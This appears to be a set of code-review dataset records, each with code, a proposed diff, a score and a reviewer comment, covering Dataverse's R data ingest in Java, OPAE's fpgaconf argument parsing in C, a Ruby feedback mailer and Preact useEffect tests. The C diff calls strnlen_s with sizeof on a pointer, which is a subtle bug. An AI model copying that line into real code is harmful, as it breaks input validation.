1kb at a time while (mInStream.read(buffer) != -1) { outStream.write(buffer); bytesRead++; } } catch (IOException ex) { LOG.warning("RDATAFileReader: Could not write to file"); LOG.fine(String.format("Error message: %s", ex.getMessage())); } catch (NullPointerException ex) { LOG.warning("RDATAFileReader: Data file has not been specified"); } // Closing R server connection if (rServerConnection != null) { LOG.fine("RDATAFileReader: Closing R server connection"); rServerConnection.close(); } return mDataFile; } private File saveCsvFile () { // Specify CSV File Location on Server mCsvDataFile = new File(mRWorkspace.getRdataFile().getParent(), "data.csv"); // String csvScript = new StringBuilder("") .append("options(digits.secs=3)") .append("\n") .append(RSCRIPT_WRITE_DVN_TABLE) .append("\n") .append(String.format("load(\"%s\")", mRWorkspace.getRdataAbsolutePath())) .append("\n") .append(RSCRIPT_GET_DATASET) .append("\n") .append(String.format("write.dvn.table(data.set, file=\"%s\")", mCsvDataFile.getAbsolutePath())) .toString(); // RRequest csvRequest = mRequestBuilder.build(); LOG.fine(String.format("RDATAFileReader: Attempting to write table 
to `%s`", mCsvDataFile.getAbsolutePath())); csvRequest.script(csvScript).eval(); return mCsvDataFile; } /** * Return Rdata File Handle on R Server * @return File asdasd */ public File getRdataFile () { return mDataFile; } /** * Return Location of Rdata File on R Server * @return the file location as a string on the (potentially) remote R server */ public String getRdataAbsolutePath () { return mDataFile.getAbsolutePath(); } } /** * Constructs a <code>RDATAFileReader</code> instance from its "Spi" Class * @param originator a <code>StatDataFileReaderSpi</code> object. */ public RDATAFileReader(TabularDataFileReaderSpi originator) { super(originator); LOG.fine("RDATAFileReader: INSIDE RDATAFileReader"); // Create request builder. // This object is used throughout as an RRequest factory mRequestBuilder = new RRequestBuilder() .host(RSERVE_HOST) .port(RSERVE_PORT) .user(RSERVE_USER) .password(RSERVE_PASSWORD); // Create R Workspace mRWorkspace = new RWorkspace(); mPID = RandomStringUtils.randomNumeric(6); } private void init() throws IOException { doubleNumberFormatter.setGroupingUsed(false); doubleNumberFormatter.setMaximumFractionDigits(340); } /** * Read the Given RData File * @param stream a <code>BufferedInputStream</code>. * @param ignored * @return an <code>TabularDataIngest</code> object * @throws java.io.IOException if a reading error occurs. */ @Override public TabularDataIngest read(BufferedInputStream stream, File dataFile) throws IOException { init(); // Create Request object LOG.fine("RDATAFileReader: Creating RRequest object from RRequestBuilder object"); try { // Create R Workspace mRWorkspace.stream(stream); mRWorkspace.create(); mRWorkspace.saveRdataFile(); mRWorkspace.saveCsvFile(); // Copy CSV file to a local, temporary directory // Additionally, this sets the "tabDelimitedDataFile" property of the FileInformation File localCsvFile = transferCsvFile(mRWorkspace.mCsvDataFile); // Generate and save all the information about data set; this creates all // the DataVariable objects, among other things: getDataFrameInformation(); // Read and parse the TAB-delimited file saved by R, above; do the // necessary post-processinga and filtering, and save the resulting // TAB file as tabFileDestination, below. This is the file we'll be // using to calculate the UNF, and for the storage/preservation of the // dataset. // IMPORTANT: this must be done *after* the variable metadata has been // created! // - L.A. 
RTabFileParser csvFileReader = new RTabFileParser('\t'); BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(new FileInputStream(localCsvFile), "UTF-8")); File tabFileDestination = File.createTempFile("data-", ".tab"); PrintWriter tabFileWriter = new PrintWriter(tabFileDestination.getAbsolutePath(), "UTF-8"); int lineCount = csvFileReader.read(localBufferedReader, dataTable, tabFileWriter); LOG.fine("RDATAFileReader: successfully read "+lineCount+" lines of tab-delimited data."); dataTable.setUnf("UNF:pending"); ingesteddata.setTabDelimitedFile(tabFileDestination); ingesteddata.setDataTable(dataTable); // Destroy R workspace mRWorkspace.destroy(); } catch (Exception ex) { throw new IOException ("Unknown exception occured during ingest; "+ex.getMessage()); } LOG.fine("RDATAFileReader: Leaving \"read\" function"); return ingesteddata; } /** * Copy Remote File on R-server to a Local Target * @param target a target on the remote r-server * @return */ private File transferCsvFile (File target) { File destination; FileOutputStream csvDestinationStream; try { destination = File.createTempFile("data", ".csv"); LOG.fine(String.format("RDATAFileReader: Writing local CSV File to `%s`", destination.getAbsolutePath())); csvDestinationStream = new FileOutputStream(destination); } catch (IOException ex) { LOG.warning("RDATAFileReader: Could not create temporary file!"); return null; } try { // Open connection to R-serve RConnection rServeConnection = new RConnection(RSERVE_HOST, RSERVE_PORT); rServeConnection.login(RSERVE_USER, RSERVE_PASSWORD); // Open file for reading from R-serve RFileInputStream rServeInputStream = rServeConnection.openFile(target.getAbsolutePath()); int b; LOG.fine("RDATAFileReader: Beginning to write to local destination file"); // Read from stream one character at a time while ((b = rServeInputStream.read()) != -1) { // Write to the *local* destination file csvDestinationStream.write(b); } LOG.fine(String.format("RDATAFileReader: Finished writing from destination `%s`", target.getAbsolutePath())); LOG.fine(String.format("RDATAFileReader: Finished copying to source `%s`", destination.getAbsolutePath())); LOG.fine("RDATAFileReader: Closing CSVFileReader R Connection"); rServeConnection.close(); } /* * TO DO: Make this error catching more intelligent */ catch (Exception ex) { } return destination; } /** * * Runs an R-script that extracts meta-data from the *original* Rdata * object, then parses its output and creates DataVariable objects. * * @throws IOException if something bad happens? 
*/ private void getDataFrameInformation() { LOG.fine("RDATAFileReader: Entering `getDataFrameInformation` function"); // Store variable names String[] variableNames = {}; String parentDirectory = mRWorkspace.getRdataFile().getParent(); String fileInfoScript = new StringBuilder("") .append(String.format("load(\"%s\")\n", mRWorkspace.getRdataAbsolutePath())) .append(String.format("setwd(\"%s\")\n", parentDirectory)) .append(RSCRIPT_GET_DATASET) .append("\n") .append(RSCRIPT_DATASET_INFO_SCRIPT) .toString(); try { RRequest request = mRequestBuilder.build(); request.script(fileInfoScript); RList fileInformation = request.eval().asList(); RList metaInfo = fileInformation.at("meta.info").asList(); int varQnty = 0; variableNames = fileInformation.at("varNames").asStrings(); //mDataTypes = fileInformation.at("dataTypes").asStrings(); // Initialize variables: List<DataVariable> variableList = new ArrayList<>(); for (String varName : variableNames) { DataVariable dv = new DataVariable(); dv.setName(varName); dv.setLabel(varName); // TODO: // Check if variables have real descriptive labels defined, // via the mechanismm provided by that special optional package... // (?) -- L.A. dv.setInvalidRanges(new ArrayList<>()); dv.setSummaryStatistics(new ArrayList<>()); dv.setUnf("UNF:6:XYZXYZXYZ"); dv.setCategories(new ArrayList<>()); variableList.add(dv); dv.setFileOrder(varQnty); dv.setDataTable(dataTable); // variableLabels.put(varName, varName); // variableNameList.add(varName); varQnty++; } dataTable.setVarQuantity(new Long(varQnty)); dataTable.setDataVariables(variableList); // Get the Variable Meta Data Table while Populating processVariableInfo(metaInfo, dataTable); if (fileInformation.at("caseQnty") != null) { int caseQuantity = 0; try { caseQuantity = fileInformation.at("caseQnty").asInteger(); } catch (REXPMismatchException rexp) { // bummer! - but not fatal. } if (caseQuantity > 0) { dataTable.setCaseQuantity(new Long(caseQuantity)); } } } catch (REXPMismatchException ex) { LOG.warning("RDATAFileReader: Could not put information correctly"); } catch (Exception ex) { ex.printStackTrace(); LOG.warning(ex.getMessage()); } } /** * Read a Local Resource and Return Its Contents as a String * <code>readLocalResource</code> searches the local path around the class * <code>RDATAFileReader</code> for a file and returns its contents as a * string. * @param path String specifying the name of the local file to be converted * into a UTF-8 string. * @return a UTF-8 <code>String</code> */ private static String readLocalResource(String path) { // Debug LOG.fine(String.format("RDATAFileReader: readLocalResource: reading local path \"%s\"", path)); // Get stream InputStream resourceStream = RDATAFileReader.class.getResourceAsStream(path); String resourceAsString = ""; // Try opening a buffered reader stream try { BufferedReader rd = new BufferedReader(new InputStreamReader(resourceStream, "UTF-8")); String line = null; while ((line = rd.readLine()) != null) { resourceAsString = resourceAsString.concat(line + "\n"); } resourceStream.close(); } catch (IOException ex) { LOG.warning(String.format("RDATAFileReader: (readLocalResource) resource stream from path \"%s\" was invalid", path)); } // Return string return resourceAsString; } /** * Get a HashMap matching column number to meta-data used in re-creating R * Objects * * @param metaInfo an "RList" Object containing indices - type, type.string, * class, levels, and format. 
* @param dataTable a dataverse DataTable object */ private void processVariableInfo(RList metaInfo, DataTable dataTable) throws IOException { // list(type = 1, type.string = "integer", class = class(values), levels = NULL, format = NULL) Integer variableType = -1; String variableTypeName = "", variableFormat = ""; String[] variableLevels = null; for (int k = 0; k < metaInfo.size(); k++) { try { // Meta-data for a column in the data-set RList columnMeta = metaInfo.at(k).asList(); // Extract information from the returned list variableType = !columnMeta.at("type").isNull() ? columnMeta.at("type").asInteger() : null; variableTypeName = !columnMeta.at("type.string").isNull() ? columnMeta.at("type.string").asString() : null; variableLevels = !columnMeta.at("levels").isNull() ? columnMeta.at("levels").asStrings() : new String[0]; variableFormat = !columnMeta.at("format").isNull() ? columnMeta.at("format").asString() : null; LOG.fine("variable type: " + variableType); LOG.fine("variable type name: " + variableTypeName); LOG.fine("variable format: " + variableFormat); for (String variableLevel : variableLevels) { LOG.fine("variable level: " + variableLevel); } //dataTable.getDataVariables().get(k).setFormatSchema("RDATA"); if (variableTypeName == null || variableTypeName.equals("character") || variableTypeName.equals("other")) { // This is a String: dataTable.getDataVariables().get(k).setTypeCharacter(); dataTable.getDataVariables().get(k).setIntervalDiscrete(); } else if (variableTypeName.equals("integer")) { dataTable.getDataVariables().get(k).setTypeNumeric(); dataTable.getDataVariables().get(k).setIntervalDiscrete(); } else if (variableTypeName.equals("numeric") || variableTypeName.equals("double")) { dataTable.getDataVariables().get(k).setTypeNumeric(); dataTable.getDataVariables().get(k).setIntervalContinuous(); } else if (variableTypeName.startsWith("Date")) { dataTable.getDataVariables().get(k).setTypeCharacter(); dataTable.getDataVariables().get(k).setIntervalDiscrete(); dataTable.getDataVariables().get(k).setFormat(variableFormat); // instead: if (variableTypeName.equals("Date")) { dataTable.getDataVariables().get(k).setFormatCategory("date"); } else if (variableTypeName.equals("DateTime")) { dataTable.getDataVariables().get(k).setFormatCategory("time"); } } else if (variableTypeName.equals("factor")) { // All R factors are *string* factors! dataTable.getDataVariables().get(k).setTypeCharacter(); dataTable.getDataVariables().get(k).setIntervalDiscrete(); if (variableLevels != null && variableLevels.length > 0) { // yes, this is a factor, with levels defined. LOG.fine("this is a factor."); boolean ordered = false; if (variableFormat != null && variableFormat.equals("ordered")) { LOG.fine("an ordered factor, too"); ordered = true; } for (int i = 0; i < variableLevels.length; i++) { VariableCategory cat = new VariableCategory(); cat.setValue(variableLevels[i]); // Sadly, R factors don't have descriptive labels; cat.setLabel(variableLevels[i]); if (ordered) { cat.setOrder(i+1); } /* cross-link the variable and category to each other: */ cat.setDataVariable(dataTable.getDataVariables().get(k)); dataTable.getDataVariables().get(k).getCategories().add(cat); } dataTable.getDataVariables().get(k).setOrderedCategorical(ordered); } } // And finally, a special case for logical variables: // For all practical purposes, they are handled as numeric factors // with 0 and 1 for the values and "FALSE" and "TRUE" for the labels. 
// (so this can also be used as an example of ingesting a *numeric* // categorical variable - as opposed to *string* categoricals, that // we turn R factors into - above. else if ("logical".equals(variableTypeName)) { dataTable.getDataVariables().get(k).setFormatCategory("Boolean"); dataTable.getDataVariables().get(k).setTypeNumeric(); dataTable.getDataVariables().get(k).setIntervalDiscrete(); String booleanFactorLabels[] = new String[2]; booleanFactorLabels[0] = "FALSE"; booleanFactorLabels[1] = "TRUE"; String booleanFactorValues[] = new String[2]; booleanFactorValues[0] = "0"; booleanFactorValues[1] = "1"; for (int i = 0; i < 2; i++) { VariableCategory cat = new VariableCategory(); cat.setValue(booleanFactorValues[i]); // Sadly, R factors don't have descriptive labels; cat.setLabel(booleanFactorLabels[i]); /* cross-link the variable and category to each other: */ cat.setDataVariable(dataTable.getDataVariables().get(k)); dataTable.getDataVariables().get(k).getCategories().add(cat); } } // Store the meta-data in a hashmap (to return later) } catch (REXPMismatchException ex) { // If something went wrong, then it wasn't meant to be for that column. // And you know what? That's okay. ex.printStackTrace(); LOG.fine(String.format("Could not process variable %d of the data frame.", k)); } } } }
1
38,245
Nice to see this `dataverse.rserve.password` fix rolled in.
IQSS-dataverse
java
@@ -273,7 +273,7 @@ int parse_args(int argc, char *argv[]) break; endptr = NULL; config.target.bus = (int) strtoul(tmp_optarg, &endptr, 0); - if (endptr != tmp_optarg + strlen(tmp_optarg)) { + if (endptr != tmp_optarg + strnlen_s(tmp_optarg, sizeof(tmp_optarg))) { fprintf(stderr, "invalid bus: %s\n", tmp_optarg); return -1; }
1
// Copyright(c) 2017, Intel Corporation // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // * Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // * Neither the name of Intel Corporation nor the names of its contributors // may be used to endorse or promote products derived from this software // without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE // POSSIBILITY OF SUCH DAMAGE. /* * @file fpgaconf.c * * @brief FPGA configure command line tool * * fpgaconf allows you to program green bitstream files to an FPGA supported by * the intel-fpga driver and API. * * Features: * * Auto-discovery of compatible slots for supplied bitstream * * Dry-run mode ("what would happen if...?") */ #include <errno.h> #include <getopt.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdbool.h> #include <sys/stat.h> #include "safe_string/safe_string.h" #include "opae/fpga.h" #include "bitstream_int.h" #include "bitstream-tools.h" /* * macro to check FPGA return codes, print error message, and goto cleanup label * NOTE: this changes the program flow (uses goto)! 
*/ #define ON_ERR_GOTO(res, label, desc) \ do { \ if ((res) != FPGA_OK) { \ print_err((desc), (res)); \ goto label; \ } \ } while (0) /* * Global configuration, set during parse_args() */ #define MAX_FILENAME_LEN 256 struct config { unsigned int verbosity; bool dry_run; enum { INTERACTIVE, /* ask if ambiguous */ NORMAL, /* stop if ambiguous */ AUTOMATIC /* choose if ambiguous */ } mode; struct target { int bus; int device; int function; int socket; } target; char *filename; } config = { .verbosity = 0, .dry_run = false, .mode = NORMAL, .target = { .bus = -1, .device = -1, .function = -1, .socket = -1 } }; struct bitstream_info { char *filename; uint8_t *data; size_t data_len; uint8_t *rbf_data; size_t rbf_len; fpga_guid interface_id; }; static fpga_result get_bitstream_ifc_id(const uint8_t *bitstream, fpga_guid *guid) { fpga_result result = FPGA_EXCEPTION; char *json_metadata = NULL; uint32_t json_len = 0; const uint8_t *json_metadata_ptr = NULL; json_object *root = NULL; json_object *afu_image = NULL; json_object *interface_id = NULL; errno_t e; if (check_bitstream_guid(bitstream) != FPGA_OK) goto out_free; json_len = read_int_from_bitstream(bitstream + METADATA_GUID_LEN, sizeof(uint32_t)); if (json_len == 0) { PRINT_MSG("Bitstream has no metadata"); result = FPGA_OK; goto out_free; } json_metadata_ptr = bitstream + METADATA_GUID_LEN + sizeof(uint32_t); json_metadata = (char *) malloc(json_len + 1); if (json_metadata == NULL) { PRINT_ERR("Could not allocate memory for metadata!"); return FPGA_NO_MEMORY; } e = memcpy_s(json_metadata, json_len+1, json_metadata_ptr, json_len); if (EOK != e) { PRINT_ERR("memcpy_s failed"); result = FPGA_EXCEPTION; goto out_free; } json_metadata[json_len] = '\0'; root = json_tokener_parse(json_metadata); if (root != NULL) { if (json_object_object_get_ex(root, GBS_AFU_IMAGE, &afu_image)) { json_object_object_get_ex(afu_image, BBS_INTERFACE_ID, &interface_id); if (interface_id == NULL) { PRINT_ERR("Invalid metadata"); result = FPGA_INVALID_PARAM; goto out_free; } result = string_to_guid(json_object_get_string(interface_id), guid); if (result != FPGA_OK) { PRINT_ERR("Invalid BBS interface id "); goto out_free; } } else { PRINT_ERR("Invalid metadata"); result = FPGA_INVALID_PARAM; goto out_free; } } out_free: if (root) json_object_put(root); if (json_metadata) free(json_metadata); return result; } /* * Print readable error message for fpga_results */ void print_err(const char *s, fpga_result res) { fprintf(stderr, "Error %s: %s\n", s, fpgaErrStr(res)); } /* * Print message depending on verbosity */ void print_msg(unsigned int verbosity, const char *s) { if (config.verbosity >= verbosity) printf("%s\n", s); } /* * Print help * TODO: uncomment options as they are implemented */ void help(void) { printf( "\n" "fpgaconf\n" "FPGA configuration utility\n" "\n" "Usage:\n" //" fpgaconf [-hvnaiq] [-b <bus>] [-d <device>] [-f <function>] <gbs>\n" " fpgaconf [-hvn] [-b <bus>] [-d <device>] [-f <function>] [-s <socket>] <gbs>\n" "\n" " -h,--help Print this help\n" " -v,--verbose Increase verbosity\n" " -n,--dry-run Don't actually perform actions\n" " -b,--bus Set target bus number\n" " -d,--device Set target device number\n" " -f,--function Set target function number\n" " -s,--socket Set target socket number\n" /* " -a,--auto Automatically choose target slot if\n" */ /* " multiple valid slots are available\n" */ /* " -i,--interactive Prompt user to choose target slot if\n" */ /* " multiple valid slots are available\n" */ /* " -q,--quiet Don't print any messages except 
errors\n" */ "\n" ); } /* * Parse command line arguments * TODO: uncomment options as they are implemented */ #define GETOPT_STRING ":hvnb:d:f:s:aiq" int parse_args(int argc, char *argv[]) { struct option longopts[] = { {"help", no_argument, NULL, 'h'}, {"verbose", no_argument, NULL, 'v'}, {"dry-run", no_argument, NULL, 'n'}, {"bus", required_argument, NULL, 'b'}, {"device", required_argument, NULL, 'd'}, {"function", required_argument, NULL, 'f'}, {"socket", required_argument, NULL, 's'}, /* {"auto", no_argument, NULL, 'a'}, */ /* {"interactive", no_argument, NULL, 'i'}, */ /* {"quiet", no_argument, NULL, 'q'}, */ {0, 0, 0, 0} }; int getopt_ret; int option_index; char *endptr = NULL; while (-1 != (getopt_ret = getopt_long(argc, argv, GETOPT_STRING, longopts, &option_index))) { const char *tmp_optarg = optarg; if ((optarg) && ('=' == *tmp_optarg)) { ++tmp_optarg; } switch (getopt_ret) { case 'h': /* help */ help(); return -1; case 'v': /* verbose */ config.verbosity++; break; case 'n': /* dry-run */ config.dry_run = true; break; case 'b': /* bus */ if (NULL == tmp_optarg) break; endptr = NULL; config.target.bus = (int) strtoul(tmp_optarg, &endptr, 0); if (endptr != tmp_optarg + strlen(tmp_optarg)) { fprintf(stderr, "invalid bus: %s\n", tmp_optarg); return -1; } break; case 'd': /* device */ if (NULL == tmp_optarg) break; endptr = NULL; config.target.device = (int) strtoul(tmp_optarg, &endptr, 0); if (endptr != tmp_optarg + strlen(tmp_optarg)) { fprintf(stderr, "invalid device: %s\n", tmp_optarg); return -1; } break; case 'f': /* function */ if (NULL == tmp_optarg) break; endptr = NULL; config.target.function = (int) strtoul(tmp_optarg, &endptr, 0); if (endptr != tmp_optarg + strlen(tmp_optarg)) { fprintf(stderr, "invalid function: %s\n", tmp_optarg); return -1; } break; case 's': /* socket */ if (NULL == tmp_optarg) break; endptr = NULL; config.target.socket = (int) strtoul(tmp_optarg, &endptr, 0); if (endptr != tmp_optarg + strlen(tmp_optarg)) { fprintf(stderr, "invalid socket: %s\n", tmp_optarg); return -1; } break; case 'a': /* auto */ config.mode = AUTOMATIC; break; case 'i': /* interactive */ config.mode = INTERACTIVE; break; case 'q': /* quiet */ config.verbosity = 0; break; case ':': /* missing option argument */ fprintf(stderr, "Missing option argument\n"); return -1; case '?': default: /* invalid option */ fprintf(stderr, "Invalid cmdline options\n"); return -1; } } /* use first non-option argument as GBS filename */ if (optind == argc) { fprintf(stderr, "No GBS file\n"); return -1; } config.filename = argv[optind]; return 0; } /* * Check for bitstream header and fill out bistream_info fields */ #define MAGIC 0x1d1f8680 #define MAGIC_SIZE 4 #define HEADER_SIZE 20 int parse_metadata(struct bitstream_info *info) { unsigned i = 0; if (!info) return -EINVAL; if (info->data_len < HEADER_SIZE) { fprintf(stderr, "File too small to be GBS\n"); return -1; } if (((uint32_t *)info->data)[0] != MAGIC) { fprintf(stderr, "No valid GBS header\n"); return -1; } /* reverse byte order when reading GBS */ for (i = 0; i < sizeof(info->interface_id); i++) info->interface_id[i] = info->data[MAGIC_SIZE+sizeof(info->interface_id)-1-i]; info->rbf_data = &info->data[HEADER_SIZE]; info->rbf_len = info->data_len - HEADER_SIZE; return 0; } /* * Read bitstream from file and populate bitstream_info structure */ //TODO: remove this check when all bitstreams conform to JSON //metadata spec. 
static bool skip_header_checks; int read_bitstream(char *filename, struct bitstream_info *info) { FILE *f; long len; int ret; struct stat file_mode; memset(&file_mode, 0, sizeof(file_mode)); if (!filename || !info) return -EINVAL; info->filename = filename; /* open file */ f = fopen(filename, "rb"); if (!f) { perror(filename); return -1; } if (fstat(fileno(f), &file_mode) != 0) { perror(filename); goto out_close; } if (S_ISREG(file_mode.st_mode) == 0) { fprintf(stderr, "Invalid input GBS file\n"); goto out_close; } /* get filesize */ ret = fseek(f, 0, SEEK_END); if (ret < 0) { perror(filename); goto out_close; } len = ftell(f); if (len < 0) { perror(filename); goto out_close; } /* allocate memory */ info->data = (uint8_t *)malloc(len); if (!info->data) { perror("malloc"); goto out_close; } /* read bistream data */ ret = fseek(f, 0, SEEK_SET); if (ret < 0) { perror(filename); goto out_free; } info->data_len = fread(info->data, 1, len, f); if (ferror(f)) { perror(filename); goto out_free; } if (info->data_len != (size_t)len) { fprintf(stderr, "Filesize and number of bytes read don't match\n"); goto out_free; } if (check_bitstream_guid(info->data) == FPGA_OK) { skip_header_checks = true; if (get_bitstream_ifc_id(info->data, &(info->interface_id)) != FPGA_OK) { fprintf(stderr, "Invalid metadata in the bitstream\n"); goto out_free; } } if (!skip_header_checks) { /* populate remaining bitstream_info fields */ ret = parse_metadata(info); if (ret < 0) goto out_free; } fclose(f); return 0; out_free: free((void *)info->data); out_close: fclose(f); return -1; } /* * Find first FPGA matching the interface ID of the GBS * * @returns the total number of FPGAs matching the interface ID */ int find_fpga(fpga_guid interface_id, fpga_token *fpga) { fpga_properties filter = NULL; uint32_t num_matches; fpga_result res; int retval = -1; /* Get number of FPGAs in system */ res = fpgaGetProperties(NULL, &filter); ON_ERR_GOTO(res, out_err, "creating properties object"); res = fpgaPropertiesSetObjectType(filter, FPGA_DEVICE); ON_ERR_GOTO(res, out_destroy, "setting object type"); res = fpgaPropertiesSetGUID(filter, interface_id); ON_ERR_GOTO(res, out_destroy, "setting interface ID"); if (-1 != config.target.bus) { res = fpgaPropertiesSetBus(filter, config.target.bus); ON_ERR_GOTO(res, out_destroy, "setting bus"); } if (-1 != config.target.device) { res = fpgaPropertiesSetDevice(filter, config.target.device); ON_ERR_GOTO(res, out_destroy, "setting device"); } if (-1 != config.target.function) { res = fpgaPropertiesSetFunction(filter, config.target.function); ON_ERR_GOTO(res, out_destroy, "setting function"); } if (-1 != config.target.socket) { res = fpgaPropertiesSetSocketID(filter, config.target.socket); ON_ERR_GOTO(res, out_destroy, "setting socket id"); } res = fpgaEnumerate(&filter, 1, fpga, 1, &num_matches); ON_ERR_GOTO(res, out_destroy, "enumerating FPGAs"); if (num_matches > 0) { retval = (int) num_matches; /* FPGA found */ } else { retval = 0; /* no FPGA found */ } out_destroy: res = fpgaDestroyProperties(&filter); /* not needed anymore */ ON_ERR_GOTO(res, out_err, "destroying properties object"); out_err: return retval; } int program_bitstream(fpga_token token, uint32_t slot_num, struct bitstream_info *info) { fpga_handle handle; fpga_result res; print_msg(2, "Opening FPGA"); res = fpgaOpen(token, &handle, 0); ON_ERR_GOTO(res, out_err, "opening FPGA"); print_msg(1, "Writing bitstream"); if (config.dry_run) { print_msg(1, "[--dry-run] Skipping reconfiguration"); } else { res = fpgaReconfigureSlot(handle, 
slot_num, info->data, info->data_len, 0); ON_ERR_GOTO(res, out_close, "writing bitstream to FPGA"); } print_msg(2, "Closing FPGA"); res = fpgaClose(handle); ON_ERR_GOTO(res, out_err, "closing FPGA"); return 1; out_close: res = fpgaClose(handle); ON_ERR_GOTO(res, out_err, "closing FPGA"); out_err: return -1; } int main(int argc, char *argv[]) { int res; int retval = 0; struct bitstream_info info; fpga_token token; uint32_t slot_num = 0; /* currently, we don't support multiple slots */ /* parse command line arguments */ res = parse_args(argc, argv); if (res < 0) { retval = 1; goto out_exit; } if (config.dry_run) printf("--dry-run is set\n"); /* allocate memory and read bitstream data */ print_msg(1, "Reading bitstream"); res = read_bitstream(config.filename, &info); if (res < 0) { retval = 2; goto out_exit; } /* find suitable slot */ print_msg(1, "Looking for slot"); res = find_fpga(info.interface_id, &token); if (res < 0) { retval = 3; goto out_free; } if (res == 0) { fprintf(stderr, "No suitable slots found.\n"); retval = 4; goto out_free; } if (res > 1) { fprintf(stderr, "Found more than one suitable slot, please be more specific.\n"); retval = 5; goto out_destroy; } print_msg(1, "Found slot"); /* program bitstream */ print_msg(1, "Programming bitstream"); res = program_bitstream(token, slot_num, &info); if (res < 0) { retval = 5; goto out_free; } print_msg(1, "Done"); /* clean up */ out_destroy: fpgaDestroyToken(&token); out_free: free(info.data); out_exit: return retval; }
1
14,915
How about the following faster alternative that doesn't need `strlen()` at all: if (*tmp_optarg == '\0' || *endptr != '\0') { fprintf(...) ... This would treat the bus argument as invalid if it's either empty (`tmp_optarg` points at '\0') or malformed (`endptr` points at something other than '\0'). Actually, the existing code would accept an empty argument and set the bus to `0`, so if (*endptr != '\0') { fprintf(...) ... would be enough. The check for an empty argument doesn't hurt, though. (See the sketch after this record.)
OPAE-opae-sdk
c
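To make the reviewer's suggestion concrete, here is a minimal, self-contained C sketch of the endptr-based validation. It is not the fpgaconf code itself; `parse_bus` is a hypothetical helper introduced only for illustration. The point is that `strtoul()` already reports where parsing stopped, so checking `*endptr` (plus, optionally, that the argument is non-empty) replaces the `strlen()`/`strnlen_s()` comparison entirely.

#include <stdio.h>
#include <stdlib.h>

/* Hypothetical helper illustrating the suggested check; not part of fpgaconf. */
static int parse_bus(const char *arg, int *bus_out)
{
	char *endptr = NULL;
	unsigned long val = strtoul(arg, &endptr, 0);

	/* Reject an empty argument, or trailing characters after the number. */
	if (*arg == '\0' || *endptr != '\0') {
		fprintf(stderr, "invalid bus: %s\n", arg);
		return -1;
	}

	*bus_out = (int)val;
	return 0;
}

int main(void)
{
	int bus = -1;

	printf("%d\n", parse_bus("0x5e", &bus));  /* 0  (accepted, bus == 0x5e) */
	printf("%d\n", parse_bus("0x5e?", &bus)); /* -1 (trailing garbage)      */
	printf("%d\n", parse_bus("", &bus));      /* -1 (empty argument)        */
	return 0;
}

Since fpgaconf parses the `-b`, `-d`, `-f`, and `-s` options identically, the same pattern would presumably apply to each of those cases in parse_args().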
@@ -7,6 +7,7 @@ class FeedbackMailer < ApplicationMailer to: self.class.support_email, subject: 'Feedback submission', from: from, + cc: from, body: message ) end
1
class FeedbackMailer < ApplicationMailer def feedback(sending_user, form_values) form_strings = form_values.map { |key, val| "#{key}: #{val}" } message = form_strings.join("\n") from = sending_user.try(:email_address) || form_values[:email] || self.default_sender_email mail( to: self.class.support_email, subject: 'Feedback submission', from: from, body: message ) end def self.support_email ENV['SUPPORT_EMAIL'] || '[email protected]' # not sensitive, so hard coding end end
1
14,036
I could be missing something here, but the `from` and `cc` are the same. On the test email sent to gatewaycommunicator, these values are different.
18F-C2
rb
@@ -32,13 +32,12 @@ describe('useEffect', () => { return null; } - render(<Comp />, scratch); - render(<Comp />, scratch); - - expect(cleanupFunction).to.be.not.called; - expect(callback).to.be.calledOnce; + act(() => { + render(<Comp />, scratch); + render(<Comp />, scratch); + }); - render(<Comp />, scratch); + act(() => render(<Comp />, scratch)); expect(cleanupFunction).to.be.calledOnce; expect(callback).to.be.calledTwice;
1
import { act } from 'preact/test-utils'; import { createElement as h, render, useEffect } from '../../../src'; import { setupScratch, teardown } from '../../_util/helpers'; import { useEffectAssertions } from './useEffectAssertions.test'; import { scheduleEffectAssert } from './_util/useEffectUtil'; /** @jsx h */ describe('useEffect', () => { /** @type {HTMLDivElement} */ let scratch; beforeEach(() => { scratch = setupScratch(); }); afterEach(() => { teardown(scratch); }); useEffectAssertions(useEffect, scheduleEffectAssert); it('calls the effect immediately if another render is about to start', () => { const cleanupFunction = sinon.spy(); const callback = sinon.spy(() => cleanupFunction); function Comp() { useEffect(callback); return null; } render(<Comp />, scratch); render(<Comp />, scratch); expect(cleanupFunction).to.be.not.called; expect(callback).to.be.calledOnce; render(<Comp />, scratch); expect(cleanupFunction).to.be.calledOnce; expect(callback).to.be.calledTwice; }); it('cancels the effect when the component get unmounted before it had the chance to run it', () => { const cleanupFunction = sinon.spy(); const callback = sinon.spy(() => cleanupFunction); function Comp() { useEffect(callback); return null; } render(<Comp />, scratch); render(null, scratch); return scheduleEffectAssert(() => { expect(cleanupFunction).to.not.be.called; expect(callback).to.not.be.called; }); }); it('Should execute effects in the right order', () => { let executionOrder = []; const App = ({ i }) => { executionOrder = []; useEffect(() => { executionOrder.push('action1'); return () => executionOrder.push('cleanup1'); }, [i]); useEffect(() => { executionOrder.push('action2'); return () => executionOrder.push('cleanup2'); }, [i]); return <p>Test</p>; }; act(() => render(<App i={0} />, scratch)); act(() => render(<App i={2} />, scratch)); expect(executionOrder).to.deep.equal(['cleanup1', 'cleanup2', 'action1', 'action2']); }); });
1
14,278
I'm honestly scared because `act` is now a hard requirement for `useEffect`, which it wasn't before... This could break some tests :(
